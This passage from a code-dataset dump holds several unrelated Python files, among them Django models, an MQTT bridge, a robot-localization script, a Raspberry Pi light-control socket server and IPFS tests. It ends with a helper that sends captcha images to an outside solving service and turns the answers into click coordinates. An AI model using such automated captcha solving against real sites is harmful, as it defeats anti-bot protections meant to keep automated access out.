pids:\r\n try:\r\n p = psutil.Process(pid)\r\n if p.name() != 'python.exe' or NAME not in p.cmdline():\r\n continue\r\n # print p.name()\r\n # print p.cmdline()\r\n mainPids.append(pid)\r\n except psutil.AccessDenied:\r\n pass\r\n except psutil.NoSuchProcess:\r\n pass\r\n except:\r\n traceback.print_exc()\r\n if mainPids:\r\n print(u'当前进程%s' % mainPids)\r\n os.system('python close_server.py')\r\n print(u'开始关闭服务')\r\n while mainPids:\r\n for _pid in mainPids[:]:\r\n try:\r\n p = psutil.Process(_pid)\r\n except psutil.NoSuchProcess:\r\n mainPids.remove(_pid)\r\n print(u'移除pid[%s]'%_pid)\r\n print(u'进程已全部关闭')\r\n else:\r\n print(u'当前无进程在运行')\r\n\r\ndef run_server():\r\n os.system('python run_servers.py')\r\n print(u'已启动服务')\r\nif __name__ == '__main__':\r\n close_server()\r\n removeLog()\r\n run_server()","sub_path":"GameServer/games/MJ_GuangXi/restart.py","file_name":"restart.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"187305440","text":"\nimport uuid\nimport datetime\nfrom django.db import models\nfrom django.contrib import admin\nfrom django.template.defaultfilters import slugify\n\n\nclass Artist(models.Model):\n\n name = models.CharField(max_length=255)\n deck = models.TextField(blank=True, null=True, help_text=\"Meta/short description. 1-3 sentences. No HTML!\")\n photo = models.FileField(upload_to='images/artists')\n bio = models.TextField(blank=True)\n website = models.URLField(blank=True)\n published = models.BooleanField(default=True)\n slug = models.SlugField(editable=False, max_length=255)\n uuid = models.CharField(max_length=255, editable=False, null=True)\n\n class Meta:\n ordering = ('name',)\n \n def __unicode__(self):\n return self.name\n \n def get_absolute_url(self):\n return \"/artists/%s/\" % self.slug\n\n def save(self):\n if not self.uuid:\n self.uuid = unicode(uuid.uuid4())\n self.slug = slugify(self)\n super(Artist, self).save()\n\n \nclass Release(models.Model):\n \n FORMATS = (\n ('Net Release', 'Net Release'),\n ('CD', 'CD'),\n ('CDR', 'CDR'),\n ('Tape', 'Tape'),\n ('Vinyl', 'Vinyl'),\n ('DVD+CD', 'DVD+CD'),\n )\n \n artists = models.ManyToManyField(Artist)\n display_name = models.CharField(max_length=255)\n title = models.CharField(max_length=255)\n deck = models.TextField(blank=True, null=True, help_text=\"Meta/short description. 1-3 sentences. No HTML!\")\n release_date = models.DateField()\n release_number = models.CharField(max_length=20)\n cover_art = models.FileField(upload_to='images/cover_art')\n description = models.TextField(blank=True)\n reviews = models.TextField(blank=True)\n format = models.CharField(max_length=20, choices=FORMATS)\n price = models.CharField(max_length=20, blank=True)\n purchase_link = models.TextField(blank=True)\n preview_track = models.TextField(blank=True)\n published = models.BooleanField(default=True)\n for_sale = models.BooleanField(default=False)\n out_of_print = models.BooleanField(default=False)\n slug = models.SlugField(editable=False, max_length=255)\n uuid = models.CharField(max_length=255, editable=False, null=True)\n\n class Meta:\n ordering = ('-release_date',)\n\n def __unicode__(self):\n return u\"%s - %s [%s]\" % (self.display_name, self.title, self.release_number)\n\n def get_absolute_url(self):\n return \"/releases/%s/\" % self.slug\n\n def save(self):\n if not self.uuid:\n self.uuid = unicode(uuid.uuid4())\n self.slug = slugify(self)\n super(Release, self).save()\n\n\nclass Track(models.Model):\n\n release = models.ForeignKey(Release)\n disc_number = models.CharField(max_length=3, blank=True, null=True)\n track_number = models.CharField(max_length=3)\n title = models.CharField(max_length=255)\n time = models.CharField(max_length=20, blank=True)\n mp3_url = models.URLField(blank=True)\n flac_url = models.URLField(blank=True)\n\n def __unicode__(self):\n return u\"%s - (%s)\" % (self.title, self.release)\n\n","sub_path":"apps/releases/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"410483982","text":"import paho.mqtt.client as mqtt\nfrom serial import Serial\nimport time\nimport random\n\ns = Serial('COM6', baudrate = 9600)\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected: \" + str(rc))\n client.subscribe(\"pinboards/ledline/percent\")\n\ndef on_message(client, userdata, msg):\n print(msg.topic, msg.payload.decode())\n s.write(bytes(msg.payload.decode() + '\\n', \"utf-8\"))\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.connect(\"simurg.iszf.irk.ru\", 1883, 60)\nclient.loop_forever()\n\n'''while True:\n #value = int(random.random() * 100)\n #client.publish(\"pinboards/ledline/percent\", payload=value)\n s.write(msg.payload.decode())\n #time.sleep(1)'''\n","sub_path":"ledLine-mqtt/mqtt_recv.py","file_name":"mqtt_recv.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"174441023","text":"from django.conf.urls import url\n\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom . import api, views\n\nweb_urls = [\n url(r'^list/$', views.EventList.as_view(), name=\"events_list\"),\n\n]\n\napi_urls = [\n url(r'^api/events/$', api.EventsListAPI.as_view()),\n]\n\napi_urls = format_suffix_patterns(api_urls)\n\nurlpatterns = web_urls + api_urls\n","sub_path":"apps/events/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"287970918","text":"def main(n):\r\n n = int(n)\r\n uni = []\r\n for i in range(0,n):\r\n uni.append(32)\r\n words = []\r\n word = ''\r\n while word.count('~')!=n:\r\n uni.reverse()\r\n x=1\r\n i=uni[0]\r\n if i == 126:\r\n i=33\r\n uni[1]=uni[1]+1\r\n else:\r\n i=i+1\r\n uni[0]=i\r\n \r\n for i in uni[1:]:\r\n if i > 126:\r\n i=33\r\n uni[x]=i\r\n uni[x+1]=uni[x+1]+1\r\n x+=1\r\n if 32 in uni:\r\n zero = uni.index(32)\r\n zero = n-1-zero\r\n else:\r\n zero = -1\r\n uni.reverse()\r\n word = ''\r\n for i in uni[zero+1:]:\r\n word+=chr(i)\r\n print (word)\r\n words.append(word)\r\n print(len(words))\r\n print(list(set(words)).sort() == words.sort())\r\nimport time\r\nstart = time.time()\r\nmain(3)\r\nprint(time.time()-start)\r\n","sub_path":"brute_force2.0.py","file_name":"brute_force2.0.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"30641079","text":"import rosbag\nimport math\nimport tf\nimport time\nimport numpy as np\nimport rospy\nfrom visualization_msgs.msg import *\nfrom geometry_msgs.msg import *\n#from scipy.stats import norm\n\ndef discretize(x, y, heading):\n row = (x / 20) + 1\n col = (y / 20) + 1\n theta = (heading / discreteSize) + 1\n return int(row), int(col), int(theta)\n\n\ndef inverseDiscretize(X, Y, theta):\n xc = X * 20\n yc = Y * 20\n tc = theta * discreteSize\n return xc, yc, tc\n\n\ndef incorporateNoise(dPoint, mean, variance):\n gauss = (1 / math.sqrt(2 * math.pi * (variance ** 2))) * math.exp(-((dPoint - mean) ** 2) / (2 * variance ** 2))\n #gauss = norm.pdf(dPoint,mean,variance)\n return gauss\n\n\ndef calculate_trajectory(x1, y1, theta1, x2, y2, theta2):\n deltaTrans = math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2) * 20\n deltaTheta1 = math.degrees(math.atan2((y2 - y1), (x2 - x1))) - theta1\n deltaTheta2 = theta2 - math.degrees(math.atan2((y2 - y1), (x2 - x1)))\n return deltaTheta1, deltaTrans, deltaTheta2\n\n\nstartTime = time.time()\nrospy.init_node(\"estimation\",anonymous=True)\ngrid = rosbag.Bag('../grid.bag')\ngrid_data = grid.read_messages(topics=['Movements', 'Observations'])\nmodel_data = []\ndiscreteSize = 90 # Discretization sizeup\ntags = [[125, 525], [125, 325], [125, 125], [425, 125], [425, 325], [425, 525]]\nstartPos = [12 * 20, 28 * 20, 200.52]\ncurrent_pose = [12, 28, int((200.52 / discreteSize) + 1)]\n\nprint(startPos)\nsamples = []\nfor data in grid_data:\n samples.append(data)\n\nbelief = np.zeros((35, 35, 360 / discreteSize), dtype=np.float32)\nbelief[current_pose[0]-1, current_pose[1]-1, current_pose[2]-1] = 1.0\nfinal_points = []\n\n#Marker properties\nmarker_publisher = rospy.Publisher('line_marker', Marker, queue_size=100)\nline = Marker()\nline.header.frame_id = \"/base_link\"\nline.header.stamp = rospy.get_rostime()\nline.ns = \"line\"\nline.action = Marker.ADD\nline.pose.orientation.w = 1.0\nline.id = 1\nline.type = Marker.LINE_STRIP\nline.scale.x = 0.2\nline.color.b = 1.0\nline.color.a = 1.0\n\n\nfor sample in samples:\n next_belief = np.zeros((35, 35, 360 / discreteSize), dtype=np.float32)\n if (sample[0] == \"Movements\"):\n\n rot1 = math.degrees(tf.transformations.euler_from_quaternion([sample[1].rotation1.x,\n sample[1].rotation1.y,\n sample[1].rotation1.z,\n sample[1].rotation1.w])[2])\n rot2 = math.degrees(tf.transformations.euler_from_quaternion([sample[1].rotation2.x,\n sample[1].rotation2.y,\n sample[1].rotation2.z,\n sample[1].rotation2.w])[2])\n translation = (sample[1].translation)*100\n # print(translation)\n #ang = startPos[2] + rot1\n\n #next_pose = discretize(startPos[0] + (translation * math.cos(ang)), startPos[1] + (translation * math.sin(ang)),startPos[2] + rot1 + rot2)\n # print(next_pose)\n\n for i in range(1, 36):\n for j in range(1, 36):\n for k in range(1, (360 / discreteSize)+1):\n prob = np.zeros((35, 35, 360 / discreteSize), dtype=np.float64)\n for l in range(1, 36):\n for m in range(1, 36):\n for n in range(1, (360 / discreteSize)+1):\n # print([i,j,k,l,m,n])\n theta1, trans, theta2 = calculate_trajectory(i, j, k*discreteSize, l, m, n*discreteSize)\n p1 = incorporateNoise(theta1, rot1, discreteSize / 2)\n p2 = incorporateNoise(trans, translation, 10)\n p3 = incorporateNoise(theta2, rot2, discreteSize / 2)\n prob[l - 1][m - 1][n - 1] = p1 * p2 * p3\n # new_belief = np.multiply(prob,belief)\n # summation = np.sum(new_belief)\n # next_belief[i-1][j-1][k-1] = summation\n next_belief[i - 1][j - 1][k - 1] = np.sum(np.multiply(prob, belief))\n belief = next_belief.copy()\n print(\"first max: \"+str(np.max(belief)))\n #a, b, c = np.where(belief == np.max(belief))\n else:\n range_var = (sample[1].range)*100\n bearing = tf.transformations.euler_from_quaternion([sample[1].bearing.x,\n sample[1].bearing.y,\n sample[1].bearing.z,\n sample[1].bearing.w])\n bearing = math.degrees(bearing[2])\n\n print(\"tag no: \" + str(sample[1].tagNum))\n landmark = tags[sample[1].tagNum]\n landmark = [int(landmark[0] /20) + 1, int(landmark[1] /20) + 1]\n for u in range(1, 36):\n for v in range(1, 36):\n for w in range(1, (360 / discreteSize)+1):\n delta_range = math.sqrt((landmark[0] - u) ** 2 + (landmark[1] - v) ** 2) * 20\n delta_bearing = math.degrees(math.atan2(landmark[1] - v , landmark[0] - u)) - (w * discreteSize)\n p11 = incorporateNoise(delta_range, range_var, 10)\n p22 = incorporateNoise(delta_bearing, bearing, discreteSize / 2)\n p12 = p11 * p22\n #print([delta_range,range_var])\n #print(landmark)\n #print tags[sample[1].tagNum]\n #print(belief[u-1][v-1][w-1])\n next_belief[u - 1][v - 1][w - 1] = p12 * belief[u - 1][v - 1][w - 1]\n # print(next_belief[u-1][v-1][w-1])\n print(\"Max: \"+str(np.max(next_belief)))\n belief = next_belief.copy()\n # belief = belief / np.sum(belief)\n belief = np.divide(belief, np.sum(belief))\n trajectory = np.unravel_index(belief.argmax(),np.shape(belief)) #np.where(belief == np.max(belief))\n print(\"Calculated pose: \" + str([trajectory[0]+1,trajectory[1]+1,trajectory[2]+1]))\n a = Point()\n a.x = (trajectory[0]+1)*0.20\n a.y = (trajectory[1]+1)*0.20\n a.z = 0\n line.points.append(a)\n marker_publisher.publish(line)\n final_points.append([trajectory[0], trajectory[1], trajectory[2]])\n\n\ntotalTime = time.time() - startTime\nprint(\"Total time: \" + str(totalTime / 60) + \" minutes\")\n","sub_path":"scripts/bayes.py","file_name":"bayes.py","file_ext":"py","file_size_in_byte":6559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"210014673","text":"tc = int(input())\nfor i in range(tc):\n output = ''\n f_text = input()\n s_text = input()\n\n for j in range(len(f_text)):\n if f_text[j] == s_text[j]:\n output += '.'\n else:\n output += '*'\n \n print(f_text)\n print(s_text)\n print(output,'\\n')\n","sub_path":"kattis/detailed_difference_s.py","file_name":"detailed_difference_s.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"364535403","text":"import RPi.GPIO as GPIO\nfrom socket import *\nfrom select import *\n\nLIVING_ROOM = 17\nBATH_ROOM = 27\nINNER_ROOM = 22\n\nLIVING_ROOM_ON = '17100'\nLIVING_ROOM_OFF = '17101'\nBATH_ROOM_ON = '27100'\nBATH_ROOM_OFF = '27101'\nINNER_ROOM_ON = '22100'\nINNER_ROOM_OFF = '22101'\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(LIVING_ROOM, GPIO.OUT)\nGPIO.setup(BATH_ROOM, GPIO.OUT)\nGPIO.setup(INNER_ROOM, GPIO.OUT)\nGPIO.setwarnings(False)\n\nHOST = '192.168.137.175'\nPORT = 10000\nBUF_SIZE = 512\nADDR = (HOST, PORT)\n\nserver_socket = socket(AF_INET, SOCK_STREAM)\nserver_socket.bind(ADDR)\nprint('bind')\n\nserver_socket.listen(1)\nprint('listen')\n\nclient_socket, addr_info = server_socket.accept()\nprint('accept')\n\n\nwhile True:\n\tdata = client_socket.recv(65535).decode()\n\tprint(data)\n\t\n\tif data == LIVING_ROOM_ON:\n\t\tGPIO.output(LIVING_ROOM, True)\n\telif data == LIVING_ROOM_OFF:\n\t\tGPIO.output(LIVING_ROOM, False)\n\telif data == BATH_ROOM_ON:\n\t\tGPIO.output(BATH_ROOM, True)\n\telif data == BATH_ROOM_OFF:\n\t\tGPIO.output(BATH_ROOM, False)\n\telif data == INNER_ROOM_ON:\n\t\tGPIO.output(INNER_ROOM, True)\n\telif data == INNER_ROOM_OFF:\n\t\tGPIO.output(INNER_ROOM, False)\n\telse:\n\t\tprint(\"Unsupported Command : {0}\".format(data))\n\n","sub_path":"ctrl_light/light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"460006595","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nimport unittest\n\n\nclass TestConfigure(unittest.TestCase):\n def test_configure_output_options(self):\n from azure.cli.core._output import AzOutputProducer\n from azure.cli.core.mock import DummyCli\n from azure.cli.command_modules.configure._consts import OUTPUT_LIST\n\n output_producer = AzOutputProducer(DummyCli())\n cli_output_options = set(output_producer._FORMAT_DICT.keys())\n configure_output_options = set(item[\"name\"] for item in OUTPUT_LIST)\n\n self.assertEqual(cli_output_options, configure_output_options,\n \"\\n{}'s output options: {}\\ndon't match az configure's output options ({}).\"\n .format(AzOutputProducer.__name__, cli_output_options, configure_output_options))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/command_modules/azure-cli-configure/azure/cli/command_modules/configure/tests/latest/test_configure.py","file_name":"test_configure.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"120035068","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 3 08:55:47 2015\n\n@author: 96isasva\n\"\"\"\nimport sys\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport model\n\n\n\nclass MyProgram(QMainWindow):\n \n def __init__(self, parent=None): \n super(MyProgram, self).__init__()\n self.setWindowTitle(\"MyProgram\")\n self.initUI()\n \n def initUI(self):\n self.frame = QWidget(self)\n self.setCentralWidget(self.frame)\n \n def run(self):\n self.show()\n sys.exit()\n \nMyProgram().run()\napp = QApplication(sys.argv)\n","sub_path":"exam1/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"375302454","text":"import unittest\nimport json\nimport requests\nfrom httmock import urlmatch, HTTMock\n\nimport ipfsApi.http\nimport ipfsApi.exceptions\n\n\n@urlmatch(netloc='localhost:5001', path=r'.*/okay')\ndef return_okay(url, request):\n return {\n 'status_code': 200,\n 'content': 'okay'.encode('utf-8'),\n }\n\n\n@urlmatch(netloc='localhost:5001', path=r'.*/fail')\ndef return_fail(url, request):\n return {\n 'status_code': 500,\n 'content': 'fail'.encode('utf-8'),\n }\n\n\n@urlmatch(netloc='localhost:5001', path=r'.*/apiokay')\ndef api_okay(url, request):\n return {\n 'status_code': 200,\n 'content': json.dumps({\n 'Message': 'okay'}).encode('utf-8')\n }\n\n\n@urlmatch(netloc='localhost:5001', path=r'.*/apifail')\ndef api_fail(url, request):\n return {\n 'status_code': 500,\n 'content': json.dumps({\n 'Message': 'Someone set us up the bomb'}).encode('utf-8')\n }\n\n\nclass TestHttp(unittest.TestCase):\n def setUp(self):\n self.client = ipfsApi.http.HTTPClient(\n 'localhost',\n 5001,\n 'api/v0',\n 'json')\n\n def test_successful_request(self):\n with HTTMock(return_okay):\n res = self.client.request('/okay')\n self.assertEqual(res, 'okay')\n\n def test_generic_failure(self):\n with HTTMock(return_fail):\n self.assertRaises(requests.HTTPError,\n self.client.request, '/fail')\n\n def test_api_failure(self):\n with HTTMock(api_fail):\n self.assertRaises(ipfsApi.exceptions.ipfsApiError,\n self.client.request, '/apifail')\n\n def test_session(self):\n with HTTMock(return_okay):\n with self.client.session():\n res = self.client.request('/okay')\n self.assertEqual(res, 'okay')\n\n def test_explicit_decoder(self):\n with HTTMock(api_okay):\n res = self.client.request('/apiokay',\n decoder='json')\n self.assertEquals(res['Message'], 'okay')\n","sub_path":"test/unit/test_http.py","file_name":"test_http.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"498608176","text":"import sys\nimport cPickle\nfrom collections import defaultdict\n\nif len(sys.argv)>1:\n target1=sys.argv[1]\nelse:\n target1 = 'F'\n\ndef mean(l):\n return sum(l)*1.0/len(l)\ndef tval(c):\n return ord(c)-65\ndef carval(v):\n if v=='':\n return (0,1)\n else:\n return (ord(v)-ord('a')+1,0)\ndef rfx(v):\n if v=='NA':\n return (0,1)\n else:\n return (v,0)\n\nf=open('predG.csv')\npredg={}\nfor l in f:\n id,p=l.rstrip().split(',')\n predg[int(id)]=float(p)\n\nlevels = { 'A':set(),'B':set(),'C':set(),'D':set(),'E':set(),'F':set(),'G':set() }\n\nlast = {}\nans = {}\nca = {}\ncostlvl = {}\ncostdir = {}\nfreq={}\ngs={}\nho={}\nca={}\ndp={}\nmc={}\nao={}\nad={}\ncv={}\ncvm={}\nrf={}\nrfm={}\ncp={}\nhist={}\ncpm={}\ndp={}\ndpm={}\nstate={}\nprior={}\nlcost={}\nuniq={}\nstates = set()\nfor col in ('A','B','C','D','E','F','G'):\n prior[col]=defaultdict(int)\ntcost=0\nccost=0\nday={}\nhour={}\nquotes = defaultdict(int)\nf=open('trains1.csv','r')\nh=f.readline()\nfor l in f:\n a=l.rstrip().split(',')\n id=a[0]\n rt=a[2]\n\n cs=float(a[24])\n if rt=='1':\n ans[id] = a[17:24]\n for col in ('A','B','C','D','E','F','G'):\n val = a[ord(col)-48]\n levels[col].add(val)\n tcost = 0\n ccost = 0\n else:\n gs[id]=a[7]\n ho[id]=a[8]\n ca[id]=a[9]\n dp[id]=a[16]\n mc[id]=a[14]\n ao[id]=a[12]\n cv[id],cvm[id] = carval(a[10])\n rf[id],rfm[id] = rfx(a[11])\n cp[id],cpm[id] = rfx(a[15])\n dp[id],dpm[id] = rfx(a[16])\n day[id]=a[3]\n hour[id]=a[4].split(':')[0]\n states.add(a[5])\n state[id]=a[5]\n ad[id]=int(a[12])-int(a[13])\n quotes[id] += 1\n if tcost > 0:\n costdir[id] = cs / (tcost/ccost)\n tcost += cs\n ccost += 1\n costlvl[id] = tcost / ccost\n if id not in freq:\n freq[id] = {}\n lcost[id] = {}\n hist[id] = {}\n uniq[id] = {}\n for col in ('A','B','C','D','E','F','G'):\n uniq[id][col] = set()\n freq[id][col] = defaultdict(int)\n lcost[id][col]=defaultdict(int)\n hist[id][col]=defaultdict(int)\n for col in ('A','B','C','D','E','F','G'):\n uniq[id][col].add(a[ord(col)-48])\n freq[id][col][a[ord(col)-48]] += 1\n lcost[id][col][a[ord(col)-48]] += cs\n prior[col][a[ord(col)-48]] += 1\n if id in last and a[ord(col)-48] == last[id][ord(col)-65]:\n hist[id][col] += 1\n else:\n hist[id][col]=1\n last[id] = a[17:24]\n\nf=open('train9'+target1+'.csv','w')\nf.write('id,y,ls,ans,last,rest')\nfor col in ('A','B','C','D','E','F','G'):\n for lvl in sorted(list(levels[col])):\n f.write(',last'+col+lvl)\nfor lvl in sorted(list(levels[target1])):\n f.write(',freq'+target1+lvl)\nfor col in ('A','B','C','D','E','F','G'):\n f.write(',hist'+col)\nfor col in ('A','B','C','D','E','F','G'):\n f.write(',uniq'+col)\nf.write(',gs')\nf.write(',ho')\nf.write(',ca')\nf.write(',dp')\nf.write(',mc')\nf.write(',ao')\nf.write(',ad')\nf.write(',costlvl')\nf.write(',costdir')\nf.write(',quotes')\nf.write(',day5')\nf.write(',day6')\nf.write(',hour')\nf.write(',cv')\nf.write(',cvm')\nf.write(',rf')\nf.write(',rfm')\nf.write(',cp')\nf.write(',cpm')\nf.write(',dp')\nf.write(',dpm')\nf.write(',predg')\nfor st in sorted(list(states)):\n f.write(',%s' % st)\n#f.write(',csrt1')\n#f.write(',csrt2')\nf.write('\\n')\nfor id in ans.keys():\n rest = 1\n for col in ('A','B','C','D','E','F','G'):\n if col!=target1 and ans[id][tval(col)]!=last[id][tval(col)]:\n rest = 0\n f.write('%s,%s,%s,%s,%s,%d' % (id,ans[id][tval(target1)],last[id][tval(target1)],''.join(ans[id]),''.join(last[id]),rest))\n for col in ('A','B','C','D','E','F','G'):\n for lvl in sorted(list(levels[col])):\n f.write(',%d' % int(last[id][tval(col)]==lvl))\n for lvl in sorted(list(levels[target1])):\n f.write(',%d' % freq[id][target1][lvl])\n for col in ('A','B','C','D','E','F','G'):\n f.write(',%d' % hist[id][col])\n for col in ('A','B','C','D','E','F','G'):\n f.write(',%d' % len(uniq[id][col]))\n f.write(',%s' % gs[id])\n f.write(',%s' % ho[id])\n f.write(',%s' % ca[id])\n f.write(',%s' % dp[id])\n f.write(',%s' % mc[id])\n f.write(',%s' % ao[id])\n f.write(',%s' % ad[id])\n f.write(',%f' % costlvl[id])\n f.write(',%f' % costdir[id])\n f.write(',%d' % quotes[id])\n f.write(',%d' % int(day[id]=='5'))\n f.write(',%d' % int(day[id]=='6'))\n f.write(',%s' % hour[id])\n f.write(',%s' % cv[id])\n f.write(',%s' % cvm[id])\n f.write(',%s' % rf[id])\n f.write(',%s' % rfm[id])\n f.write(',%s' % cp[id])\n f.write(',%s' % cpm[id])\n f.write(',%s' % dp[id])\n f.write(',%s' % dpm[id])\n f.write(',%s' % predg[int(id)])\n for st in sorted(list(states)):\n f.write(',%d' % int(state[id]==st))\n# c1 = 0\n# c2 = 0\n# t1 = 0\n# t2 = 0\n# for k,v in lcost[id][target1].items():\n# if k==last[id][tval(target1)]:\n# c1 += v\n# t1 += 1\n# t1 += freq[id][target1][k]\n# else:\n# c2 += v\n# t2 += 1\n# t2 += freq[id][target1][k]\n# if c2==0:\n# c2=c1\n# t2=t1\n# f.write(',%f' % ((c1*1.0/t1)/(c2*1.0/t2)))\n# c1 = 0\n# c2 = 0\n# t1 = 0\n# t2 = 0\n# for k,v in lcost[id][target2].items():\n# if k==last[id][tval(target2)]:\n# c1 += v\n# t1 += freq[id][target2][k]\n# else:\n# c2 += v\n# t2 += freq[id][target2][k]\n# if c2==0:\n# c2=c1\n# t2=t1\n# f.write(',%f' % ((c1*1.0/t1)/(c2*1.0/t2),))\n f.write('\\n')\n","sub_path":"pp/flatten9.py","file_name":"flatten9.py","file_ext":"py","file_size_in_byte":5722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"197113226","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 20 14:59:19 2019\n\n@author: leguillou\n\"\"\"\n\nimport argparse \nimport sys, os\nimport numpy as np \nfrom scipy import interpolate\nimport pickle\n\ndef compute_mean_rmse(rmse, prods, name):\n \n mean_rmse = [] \n rmse_data = rmse['RMSE']\n for prod in prods:\n mean_rmse.append(np.mean(rmse_data[name][prod]))\n \n return mean_rmse\n\ndef compute_eff_res(spec, prods, name, r=0.5):\n \n eff_res = []\n wavenumber = spec['wavenumber'] *1e3 # in cycle/km\n recScore_data = spec['recScore']\n for prod in prods:\n f = interpolate.interp1d(recScore_data[name][prod], 1/wavenumber, axis=0) \n eff_res.append(f(r))\n \n return eff_res\n\ndef write_outputs(file,mean_rmse_duacs,mean_rmse_da,eff_res_duacs,eff_res_da, prods):\n f = open(file,'w')\n # DUACS\n if mean_rmse_duacs is not None and eff_res_duacs is not None:\n f.write('DUACS\\n')\n f.write('\\t RMSE:\\n' )\n for i,prod in enumerate(prods):\n f.write('\\t\\t' + prod + ': ' + \"{:.3E}\".format(mean_rmse_duacs[i]) + '\\n') \n f.write('\\t Eff Res:\\n' )\n for i,prod in enumerate(prods):\n f.write('\\t\\t' + prod + ': ' + \"{:.3E}\".format(eff_res_duacs[i]) + '\\n') \n # DA\n f.write('\\nDA\\n')\n f.write('\\t RMSE:\\n' )\n for i,prod in enumerate(prods):\n f.write('\\t\\t' + prod + ': ' + \"{:.3E}\".format(mean_rmse_da[i]) + '\\n') \n f.write('\\t Eff Res:\\n' )\n for i,prod in enumerate(prods):\n f.write('\\t\\t' + prod + ': ' + \"{:.3E}\".format(eff_res_da[i]) + '\\n') \n \n\n##======================================================================================================================##\n## MAIN ##\n##======================================================================================================================##\n\nif __name__ == '__main__':\n #+++++++++++++++++++++++++++++++#\n # _#\n #+++++++++++++++++++++++++++++++#\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('--path_config_exp', default=None, type=str) # parameters relative to the DA experiment\n parser.add_argument('--name_config_comp', default=None, type=str) # parameters relative to NATL60 and DUACS \n parser.add_argument('--prods', default=['ssh'],nargs='+', type=str)\n parser.add_argument('--overwrite', default=1, type=int)\n opts = parser.parse_args()\n \n #+++++++++++++++++++++++++++++++#\n # GET params #\n #+++++++++++++++++++++++++++++++#\n print('\\n* Get parameters')\n # parameters relative to the DA experiment\n dir_exp = os.path.dirname(opts.path_config_exp)\n name_exp = os.path.basename(opts.path_config_exp)\n sys.path.insert(0,dir_exp)\n exp = __import__(name_exp, globals=globals())\n # parameters relative to NATL60 and DUACS \n sys.path.insert(0,os.path.join(os.path.dirname(__file__), \"configs\"))\n comp = __import__(opts.name_config_comp, globals=globals())\n \n #+++++++++++++++++++++++++++++++#\n # Diagnostics #\n #+++++++++++++++++++++++++++++++#\n file_inputs = comp.path_out+exp.name_experiment +'/analysis.pic'\n file_outputs = comp.path_out+exp.name_experiment +'/diags.txt'\n if os.path.isfile(file_outputs) and opts.overwrite!=1: \n print(file_outputs, 'already exists')\n else:\n if opts.overwrite==1: \n print('Warning:', file_outputs, 'already exists but you ask to overwrite it')\n # DUACS\n if hasattr(comp, 'path_duacs'):\n DUACS = True\n else:\n print('No DUACS-related parameters --> no diagnostics will be computed')\n DUACS = False\n #+++++++++++++++++++++++++++++++#\n # Read analysis #\n #+++++++++++++++++++++++++++++++#\n print('\\n* Read Analysis') \n with open(file_inputs, 'rb') as f:\n spec, rmse = pickle.load(f)\n \n #+++++++++++++++++++++++++++++++#\n # Evaluate metrics #\n #+++++++++++++++++++++++++++++++#\n print('\\n* Evaluate metrics ')\n mean_rmse_da = compute_mean_rmse(rmse, opts.prods, name='da')\n eff_res_da = compute_eff_res(spec, opts.prods, name='da')\n if DUACS:\n mean_rmse_duacs = compute_mean_rmse(rmse, opts.prods, name='duacs')\n eff_res_duacs = compute_eff_res(spec, opts.prods, name='duacs')\n else:\n mean_rmse_duacs = eff_res_duacs = None\n \n #+++++++++++++++++++++++++++++++#\n # Write outputs #\n #+++++++++++++++++++++++++++++++#\n print('\\n* Write outputs ')\n print(file_outputs)\n write_outputs(file_outputs, mean_rmse_duacs,mean_rmse_da,eff_res_duacs,eff_res_da, opts.prods)\n \n\n \n \n","sub_path":"diags.py","file_name":"diags.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"448021372","text":"# -*- coding: utf-8 -*-\n\nfrom requests import post\nfrom .consts import urls\n\n\n# map items, for example: '5' --> (2, 1) --> (105, 35)\ndef map_items(items):\n cors = []\n for item in items:\n item = int(item)\n m, d = item%4, item//4\n x = 4 if m == 0 else m\n y = d if m == 0 else d + 1\n cors = cors + [(p-1)*70 + 35 for p in [x, y]]\n return cors\n\n# verifying captcha\ndef verify_captcha_auto(captcha_img_path):\n url = urls['punch_captcha']\n files = {'file': open(captcha_img_path, 'rb')}\n try:\n res = post(url, files=files, timeout=5)\n items = res.text.split('')[1].split('<')[0].split(' ')\n return ','.join([str(i) for i in map_items(items)])\n except:\n return False\n\n# verify captcha by hand .. 